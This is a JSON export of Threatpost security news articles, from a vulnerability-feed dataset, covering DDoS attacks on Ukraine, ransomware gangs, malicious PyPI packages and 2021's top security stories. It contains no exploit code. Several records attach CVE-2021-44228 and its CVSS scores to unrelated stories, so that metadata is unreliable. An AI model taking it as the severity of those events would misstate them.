to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability _of these websites and services, but not the _integrity _of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks \u201cdesigned to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian- advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers however noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. \u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Law enforcement, C-suite executives and the cybersecurity community at-large have been laser-focused on stopping the expensive and disruptive barrage of ransomware attacks \u2014 and it appears to be working, at least to some extent. Nonetheless, recent moves from the LockBit 2.0 and BlackCat gangs, plus this weekend\u2019s hit on the Swissport airport ground-logistics company, shows the scourge is far from over.\n\nIt\u2019s more expensive and riskier than ever to [launch ransomware attacks,](<https://www.coveware.com/blog/2022/2/2/law-enforcement-pressure-forces-ransomware-groups-to-refine-tactics-in-q4-2021>) and ransomware groups have responded by mounting fewer attacks with higher ransomware demands, Coveware has reported, finding that the average ransomware payment in the fourth quarter of last year climbed by 130 percent to reach $322,168. Likewise, Coveware found a 63 percent jump in the median ransom payment, up to $117,116.\n\n## **Fewer Attacks, Bigger Ransom Demands **\n\n\u201cAverage and median ransom payments increased dramatically during Q4, but we believe this change was driven by a subtle tactical shift by ransomware-as-a-service (RaaS) operations that reflected the increasing costs and risks previously described,\u201d Coveware analysts said. \u201cThe tactical shift involves a deliberate attempt to extort companies that are large enough to pay a \u2018big game\u2019 ransom amount but small enough to keep attack operating costs and resulting media and law enforcement attention low.\u201d\n\nThat means ransomware groups have started to focus on small-to-medium sized businesses to avoid law-enforcement attention and publicity like what came with the [Colonial Pipeline attack](<https://threatpost.com/takeaways-colonial-pipeline-ransomware/166980/>) last year, Coveware added.\n\n## **Groups Looking to Lower Their Profile**\n\n\u201cThe proportion of companies attacked in the 1,000- to 10,000-employee count size increased from 8 percent in Q3 to 14 percent in Q4,\u201d the researchers found. \u201cThe average ransom payment in just this employee bucket was well north of one million dollars, which dragged the Q4 average and median amounts higher.\u201d\n\nThe Coveware team said it expects this trend will likely continue, led by the most prolific ransomware-as-a-service operators out there: Conti, LockBit 2.0 and Hive. Following splashy law-enforcement takedowns, including the [Russia\u2019s roundup of REvil members](<https://threatpost.com/russian-security-revil-ransomware/177660/>), Coveware predicted that these groups will try and keep a low profile.\n\n\u201cWhile all RaaS operations need to recruit affiliates, we expect groups to become more reserved in their public messaging and more careful about what companies they target,\u201d Coveware researchers added. \u201cThe lessons learned from the pipeline attack and the recent FSB arrests are likely to keep some of the more vibrant displays of public bravado in check.\u201d\n\nBut a lower profile doesn\u2019t mean ransomware operators aren\u2019t still honing their skills.\n\n## **BlackCat\u2019s Rebrand, Triple-Extortion Threat **\n\nBlackCat, also known as ALPHV, an upstart [RaaS operation](<https://www.tripwire.com/state-of-security/security-data-protection/blackcat-ransomware-what-you-need-to-know/>), is on the rise and rapidly recruiting affiliates, according to Tripwire\u2019s Graham Cluley, who explained that the group has started adding pressure for their victims to pay by not only stealing their data and threatening to release it, but also promising a crippling distributed denial-of-service (DDoS) should they refuse to pay \u2014 a ransomware tactic known as \u201c[triple extortion](<https://threatpost.com/ransomwares-swindle-triple-extortion/166149/>).\u201d\n\nFirst discovered by the MalwareHunterTeam, the operators of the [Rust-coded BlackCat](<https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-linked-to-blackmatter-darkside-gangs/>) ransomware call themselves ALPHV, but the MalwareHunterTeam dubbed them BlackCat after the image used on the payment page the victims must visit on Tor to pay, Bleeping Computer reported. The report also confirmed that BlackCat is essentially a re-brand, adding the group members have confirmed they were [previous members of the BlackMatter/DarkSide group](<https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-linked-to-blackmatter-darkside-gangs/>).\n\nLockBit 2.0 is another group adding pressure on its victims to pay with threats to release a company\u2019s customer data \u2014 and it hasn\u2019t been laying so low, either.\n\n> [ALERT] LockBit ransomware gang has announced Cryptocurrency Exchange \"paybito\" on the victim list. [pic.twitter.com/TTq4pv1SRP](<https://t.co/TTq4pv1SRP>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [February 3, 2022](<https://twitter.com/darktracer_int/status/1489343888653361154?ref_src=twsrc%5Etfw>)\n\nLockBit 2.0 recently took credit for breaching cryptocurrency exchange platform playbito.com, threat hunter DarkTracer tweeted. The researcher also posted a warning from LockBit2.0 that the group will publish the personal data of more than 100,000 of the platform\u2019s users unless the ransom is paid by Feb. 21.\n\n\u201cCustomers from USA/WorldWide personal data, mail/hash, weak has algorithm,\u201d the message read. \u201cAdmins personal data, admin emails and hashes. If you want it buy it \u2014 contact us with TOX.\u201d\n\nThe following day, the FBI put out [indicators of compromise associated with LockBit 2.0](<https://www.ic3.gov/Media/News/2022/220204.pdf>) and asked anyone who thinks they might have been compromised by the group to contact the FBI Cyber Squad immediately.\n\n\u201cThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with the threat actors, Bitcoin wallet information, the decryptor file, and/or a benign sample of an encrypted file,\u201d the FBI alert said, adding that the department does not encourage paying ransoms, but understands business decisions need to be made to keep operations going.\n\n## **Swissport Attack: Ransomware Still Going Strong**\n\nBut even as ransomware operators are feeling new pressure, successful attacks are still being pulled off regularly.\n\nOver the weekend, Swissport was taken down by a [ransomware attack](<https://www.spiegel.de/netzwelt/web/swissport-hackerangriff-stoert-zeitweise-flugbetrieb-in-der-schweiz-a-44285ac8-ad73-42ea-b751-91559c2ff4c8>) which caused the delay of 22 flights out of Zurich, Switzerland, according to an airport spokeswoman who spoke with Der Speigel.\n\n> \u26a0\ufe0fIT security incident at [#Swissport](<https://twitter.com/hashtag/Swissport?src=hash&ref_src=twsrc%5Etfw>) contained. Affected infrastructure swiftly taken offline. Manual workarounds or fallback systems secured operation at all times. Full system clean-up and restoration now under way. We apologize for any inconvenience.\n> \n> \u2014 Swissport (@swissportNews) [February 5, 2022](<https://twitter.com/swissportNews/status/1489903446966812676?ref_src=twsrc%5Etfw>)\n\nBottom line? For now, ransomware is here to stay, but evolving.\n\nThe latest research from Trellix suggests that moving forward in 2022, financial services are going to be bombarded with [ransomware attacks](<https://www.trellix.com/en-us/threat-center/threat-reports/jan-2022.html>). From the second to the third quarter of 2021, attacks on the finance and insurance sector increased by 21 percent, followed by just a 7 percent increase in healthcare attacks, the firm noted.\n\n\u201cIn the third quarter of 2021, high-profile ransomware groups disappeared, reappeared, reinvented, and even attempted to rebrand, while remaining relevant and prevalent as a popular and potentially devastating threat against an increasing spectrum of sectors,\u201d Trellix chief scientist Raj Samani said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:09:27", "type": "threatpost", "title": "LockBit, BlackCat, Swissport, Oh My! Ransomware Activity Stays Strong", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:09:27", "id": "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "href": "https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times. and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software-supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": "https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 & 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central 